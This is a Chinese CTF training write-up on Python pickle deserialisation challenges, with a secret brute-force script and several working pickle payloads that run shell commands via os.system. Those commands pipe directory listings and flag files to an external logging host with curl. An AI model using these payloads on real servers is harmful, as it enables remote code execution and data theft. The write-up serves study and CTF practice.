HITCTF TRAIN 做题记录

训练一波

MISC

签到

打开源代码,观察到flag=ZmxhZ3t3ZTFjMG1lX3QwX0xpbGFjX0NURl9UMzRtfQo=

那么直接base64 decode得到flag

flag{we1c0me_t0_Lilac_CTF_T34m}

2019-11-03-WEB

2018-HITB-Python’s-Revenge

先观察app.py

发现cookie_secret只有四位字母

爆破一下得到密码ctfd

爆破脚本:

import base64
import itertools
import operator
import os
import pickle
import string
from hashlib import sha256

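asciis = string.ascii_letters + string.digits

# Target digest taken from the challenge: sha256(leak + secret).
sha = "b8ea3fb625c03dcaaa38615144b83944b23061a6fdba2e580f312a5f9504e597"

# Fixed prefix the target hash was computed over (value from the challenge).
# Hoisted out of the search loop: it never changes between candidates.
leak = "VnJlbQpwMAou".encode('utf-8')

# Kept for compatibility with the original script: 1 = not found yet, 0 = found.
flag = 1


def find_secret(target, prefix, alphabet=asciis, length=4):
    """Return the first ``length``-char string over ``alphabet`` whose
    ``sha256(prefix + candidate)`` hex digest equals ``target``, or None.

    Candidates are enumerated in the same lexicographic order as the
    original nested loops, so the first hit is identical.  The search is
    only feasible because the key space is tiny (62**4 for the defaults);
    a signing secret that can be enumerated like this offers no protection,
    which is the lesson of this challenge.

    Args:
        target: hex SHA-256 digest to match.
        prefix: bytes hashed before the candidate secret.
        alphabet: characters the secret may consist of.
        length: secret length in characters.
    """
    for combo in itertools.product(alphabet, repeat=length):
        candidate = "".join(combo)
        if sha256(prefix + candidate.encode('utf-8')).hexdigest() == target:
            return candidate
    return None


if __name__ == "__main__":
    found = find_secret(sha, leak)
    if found is not None:
        print(found)
        flag = 0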

那么我们来签一下名就行了

观察得到最多执行四个函数,还用黑名单屏蔽了几乎所有能用的函数

上网搜到map可以绕过

那么我们进行构造

注意:一定要在 Linux 下面运行,不然结果会出错,这个坑了我好半天,最后拿 pickletools 才看出来

查看目录

import pickle
import base64
import os
import hashlib
import pickletools

class Test(object):
    """Pickle gadget: unpickling an instance runs a shell command.

    The unpickler rebuilds an object by calling whatever ``__reduce__``
    returned, so deserialisation itself evaluates ``map(os.system, [...])``.
    This is why ``pickle.loads`` on client-controlled data is equivalent to
    code execution on the server; the only robust defence is not to unpickle
    untrusted input (a signature only helps when its key cannot be guessed,
    unlike the 4-character secret in this write-up).
    """
    def __init__(self):
        # Not part of the pickle: __reduce__ below returns no state.
        self.a = 1
        self.b = '2'
        self.c = '3'
    def __reduce__(self):
        # ``map`` stands in for a direct call because the challenge blacklists
        # the usual callables (see the write-up); in Python 2 map() is eager,
        # so the command runs as soon as the object is rebuilt.
        return map,(os.system,["curl -L {your_web_log_website}`ls -a / | base64`"])

secret = "ctfd"

def make_cookie(location, secret):
    """Assemble the ``<digest>!<location>`` cookie string.

    ``location`` is the base64-encoded pickle (bytes); ``secret`` is the
    signing key.  The digest comes from ``calc_digest`` in this file.
    """
    digest = calc_digest(location, secret)
    body = location.decode()
    return "%s!%s" % (digest, body)

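def calc_digest(location, secret):
    """Return the hex SHA-256 of ``location`` followed by ``secret``.

    The original only worked on Python 2: formatting ``"%s%s"`` renders a
    bytes ``location`` as ``b'...'`` on Python 3 and ``hashlib`` then
    rejects the str.  Both inputs are normalised to bytes first, which is
    a no-op on Python 2 (str is bytes there) and gives the same digest on
    both interpreters.

    Args:
        location: str or bytes, hashed first.
        secret: str or bytes, appended after ``location``.
    Returns:
        64-char lowercase hex digest.

    Note: the construction is only as strong as the secret; the
    4-character key in this write-up is trivially enumerable.
    """
    loc = location if isinstance(location, bytes) else location.encode("utf-8")
    key = secret if isinstance(secret, bytes) else secret.encode("utf-8")
    return hashlib.sha256(loc + key).hexdigest()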

# Serialise the gadget, drop unused memo PUT opcodes, base64 it and sign it.
aa = Test()
pickled = pickletools.optimize(pickle.dumps(aa))
payload = base64.b64encode(pickled)
print(make_cookie(payload, secret))

发现了flag

那么我们cat一下

import pickle
import base64
import os
import hashlib
import pickletools

class Test(object):
    """Pickle gadget: unpickling an instance runs a shell command.

    Identical to the directory-listing variant above except for the command.
    The unpickler calls whatever ``__reduce__`` returned, so deserialising
    client-controlled bytes is code execution; the server-side fix is to
    never unpickle untrusted input.
    """
    def __init__(self):
        # Not part of the pickle: __reduce__ below returns no state.
        self.a = 1
        self.b = '2'
        self.c = '3'
    def __reduce__(self):
        # ``map`` is used to get around the challenge's callable blacklist;
        # Python 2's eager map() runs the command during unpickling.
        return map,(os.system,["curl -L {your_web_log_website}`cat /flag | base64`"])

secret = "ctfd"

def make_cookie(location, secret):
    """Return the cookie as ``<digest>!<location>``.

    ``location`` is the base64 pickle (bytes) and ``secret`` the signing
    key; the digest is computed by ``calc_digest`` from this file.
    """
    signature = calc_digest(location, secret)
    return "%s!%s" % (signature, location.decode())

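def calc_digest(location, secret):
    """Return the hex SHA-256 of ``location`` followed by ``secret``.

    Python-2-only in the original: on Python 3 ``"%s%s"`` turns a bytes
    ``location`` into the text ``b'...'`` and ``hashlib`` refuses str.
    Normalising both inputs to bytes keeps Python 2 behaviour unchanged
    (str is already bytes there) and makes Python 3 produce the same digest.

    Args:
        location: str or bytes, hashed first.
        secret: str or bytes, appended after ``location``.
    Returns:
        64-char lowercase hex digest.
    """
    loc = location if isinstance(location, bytes) else location.encode("utf-8")
    key = secret if isinstance(secret, bytes) else secret.encode("utf-8")
    return hashlib.sha256(loc + key).hexdigest()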

# Pickle the gadget, strip unused memo opcodes, base64-encode and sign.
aa = Test()
raw = pickle.dumps(aa)
payload = base64.b64encode(pickletools.optimize(raw))
print(make_cookie(payload, secret))

2019-SJTU-Pickle

在坤坤的帮助下

我学会了pickle

import base64
import pickle
import os
import favorite

class Animal:
    """Client-side twin of the challenge's ``favorite.Animal``.

    ``__eq__`` returns True for any operand, so an instance compares equal
    to whatever the server holds - a reminder that equality against an
    unpickled object is not a meaningful validation step.  ``__reduce__``
    makes pickling emit a call to ``Animal`` with the current values of
    ``favorite.name`` / ``favorite.category`` (``favorite`` is the challenge
    module and is not part of this snippet).
    """
    def __init__(self, name, category):
        self.name = name
        self.category = category

    def __repr__(self):
        return f'Animal(name={self.name!r}, category={self.category!r})'

    def __eq__(self, other):
        # Deliberately unconditional; see the class docstring.
        return True
    def __reduce__(self):
        # (callable, args): the unpickler rebuilds this as Animal(name, category).
        return (Animal,(favorite.name,favorite.category))

# Mirrors the server-side object; not referenced further down.
fas = favorite.Animal(favorite.name, favorite.category)

# Hand-written protocol-3 pickle of __main__.Animal.  Its ``name`` and
# ``category`` fields are GLOBAL references (``c`` opcodes) to favorite.name
# and favorite.category, resolved by the unpickler on the server, rather
# than literal strings embedded in the stream.
fu = b'\x80\x03c__main__\nAnimal\nq\x00)\x81q\x01}q\x02(X\x04\x00\x00\x00nameq\x03cfavorite\nname\nq\x04X\x08\x00\x00\x00categoryq\x05cfavorite\ncategory\nq\x06ub.'

encoded = base64.b64encode(fu)
print(encoded.decode())

2019-SJTU-Pickle-Revenge

观察和前一个pickle的区别,发现这玩意限制了模块只能由__main__启动,不能从别的模块那里弄到

那么根据奇妙的知识,我们就明白了可以利用一些巧妙的方式进行改写

直接上脚本

import pickle
import pickletools
import base64

# Hand-assembled protocol-3 pickle in two segments.  The first BUILDs a
# {name, category} state dict onto ``__main__.favorite`` (BUILD with no
# ``__setstate__`` updates the target's ``__dict__``) and then POPs (``0``)
# it off the stack; the second constructs ``__main__.Animal`` with the same
# fields as the value that is actually returned.
payload = b"\x80\x03c__main__\nfavorite\n}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00kittyq\x04X\x08\x00\x00\x00categoryq\x05X\x03\x00\x00\x00catq\x06ub0c__main__\nAnimal\n)\x81}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00kittyq\x04X\x08\x00\x00\x00categoryq\x05X\x03\x00\x00\x00catq\x06ub."

# Drop unused memo PUT opcodes so the two streams are easier to compare.
p = pickletools.optimize(payload)

# A plain Animal(name='kitty', category='cat') pickle, decoded and
# disassembled next to the payload for comparison.
last = "gANjX19tYWluX18KQW5pbWFsCnEAKYFxAX1xAihYBAAAAG5hbWVxA1gFAAAAa2l0dHlxBFgIAAAAY2F0ZWdvcnlxBVgDAAAAY2F0cQZ1Yi4="

print(base64.b64decode(last))

word = pickletools.optimize(base64.b64decode(last))

# pickletools.dis only disassembles - it never executes the stream - which
# makes it the safe way to inspect a pickle of unknown origin.
pickletools.dis(word)

pickletools.dis(p)

print(base64.b64encode(payload).decode())

2019-SJTU-Pickle-Revenge-Back

这个题需要一些RCE的技巧

URL

先获得目录

import os
import pickle
import pickletools
import base64

# Hand-assembled protocol-3 pickle.  The first BUILD (``b``) stores
# ``os.system`` in the instance dict under the key ``__setstate__``; the
# unpickler calls ``__setstate__`` on the next BUILD, so the following
# string is handed to os.system.  ``0`` (POP) discards that result and a
# plain-looking Animal is assembled as the stream's final value.  This is
# the reason client-controlled bytes must never reach pickle.loads.
# Nothing is executed here: pickletools.dis only disassembles.
payload = b"\x80\x03c__main__\nAnimal\n)\x81}(V__setstate__\ncos\nsystem\nubVcurl -L {your_web_log_website}`ls / |base64`\nb0c__main__\nAnimal\n}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00kittyq\x04X\x08\x00\x00\x00categoryq\x05X\x03\x00\x00\x00catq\x06ub."

pickletools.dis(payload)

encoded = base64.b64encode(payload)
print(encoded.decode())

再拿到flag

import os
import pickle
import pickletools
import base64

# Same opcode layout as the directory-listing payload above, with a
# different command string: BUILD plants ``os.system`` as ``__setstate__``,
# the next BUILD invokes it, POP discards the result.  pickletools.dis
# below only disassembles; nothing runs on the client side.
payload = b"\x80\x03c__main__\nAnimal\n)\x81}(V__setstate__\ncos\nsystem\nubVcurl -L {your_web_log_website}`cat /f11111111l4444gggg |base64`\nb0c__main__\nAnimal\n}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00kittyq\x04X\x08\x00\x00\x00categoryq\x05X\x03\x00\x00\x00catq\x06ub."

pickletools.dis(payload)

b64 = base64.b64encode(payload)
print(b64.decode())
